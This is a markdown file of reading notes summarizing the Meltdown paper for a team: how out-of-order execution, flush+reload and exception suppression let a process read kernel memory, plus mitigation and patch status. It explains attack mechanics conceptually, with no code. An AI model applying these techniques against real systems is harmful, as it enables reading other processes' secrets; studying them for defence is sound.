Skip to content

Latest commit

 

History

History
39 lines (32 loc) · 6.13 KB

meltdown.md

File metadata and controls

39 lines (32 loc) · 6.13 KB

Reading: Meltdown

3 Takeaways

  • Through a side-channel attack, Meltdown takes advantage of a performance feature of modern CPUs called out-of-order execution to get access to memory reserved for the kernel, as well as memory used by other proesses. Memory used by the kernel and other process should not be accessible to the application.
  • Because the exploit depends on a feature of modern CPUs that turns out to be a vulnerability due to side-channels, it affects all operating systems running on those CPUs. The paper shows that on an operating system like Linux or OS X, the entire physical memory can be read. This includes reading the memory of sandboxed processes that should be protected by things like containers/virtualization.
  • Luckily, and unlike the related Spectre attack, Meltdown can largely be avoided through a countermeasure called KAISER that was developed a year earlier for the Linux kernel. At this point, the major operating systems all have similar patches available to protect against Meltdown, albeit by incurring a performance penalty.

Questions I have going in

  • What is the difference between out-of-order execution (apparently what Meltdown exploits) and speculative execution (apparently what Spectre exploits)?

Overall notes

  • Section 2 is a great recap (or introduction) to computer architecture/organization classes. Each program has access to virtual memory addresses, which are mapped to physical memory by way of translation tables that are swapped out at each context (program) switch. The kernel's memory (kernel space) is also accessible in each virtual address space to make process <-> kernel communication more efficient. In practice on Linux and OS X, the entire physical memory is accessible in the kernel's memory, though through something called KASLR it's randomized on each reboot. Programs normally can't access kernel space without permission, but through some cache/side-channel tricks, they will be able to surmise what's in kernel space, and by extension what's in the rest of physical memory.
  • The way the process is able to determine the contents of a page it can't access is via a flush+reload attack, which is written about in a different paper. A screenshot from the paper helps explain how it works. Basically, if your program says "get rid of this memory location" and then tries to access the location again after some time, if it takes a short amount of time to pull the data up again, then it's likely been read (into a shared cache) by some other program: flush+reload
  • To show how a read based on some data you're not allowed to access is possible with flush+reload, the authors provide a toy example, which I've annotated. Assuming data is a byte (256 possible values), and given that memory pages are 4 KB, I can create an array of size 1MB (256*4096). After reading array element data * 4096, I can flush+reload pages to determine which page was read, corresponding to the value of `data: flush+reload
  • But how can you hit an exception and not crash your program? The authors offer three approaches:
    1. fork your program and let your child run the exceptional code (crashing) as well as the out-of-order read. Then run flush+reload to see what your child read.
    2. create a signal-based exception handler that tells the program to ignore the crash/segmentation fault.
    3. suppress the exception through transactional memory, or some tricks that the Spectre attack utilizes that I didn't understand.
  • Section 5 explains the 5-line assembly inner loop. I've annoted the assembly to understand it better. Essentially, outside of this assembly, you're looping over every byte of the kernel. For each byte, you run the code in the annotated screenshot below, trying to access a mapped part of your probe array. After each byte, you run flush+reload to determine what the value at that kernel memory byte was. Sounds tiring, except it's done by a computer :): annotated assembly
  • You might think reading a byte at a time is slow. In fact, in Section 5.2, they explain that because flush+reload across 256 pages is the slow part, they read a bit at a time and just determine if it was a 0 or a 1 rather than flush+reloading a large probe array.

Questions I have coming out

  • Does 503 KB/second mean the exploit is too slow in practice? At 503 KB/second, it would take (1024*1024*1024/(503*1024))/3600 =~ 0.58 hours to read 1 GB of memory. That means it would take several days to copy memory from a modern server, which doesn't seem unreasonable. You'd probably hit some unencrypted passwords before then :).
  • Does this exploit work with one process checking it's own flush+reload statistics, or are there two applications, one probing and one flushing+reloading?

Questions for B12 to ponder

  • Are we patched :)? I'm pretty sure we are by virtue of AWS upgrading all of the host kernels on our virtualized instances.
  • What's the best way to read papers like these? My process was: 1) Read Adrian's blog post, 2) Read the paper a section at a time, 3) Annotate the figures to make sure I could explain them to myself, 4) Find a useful figure in the flush+reload paper to make sure I understood it.

Other references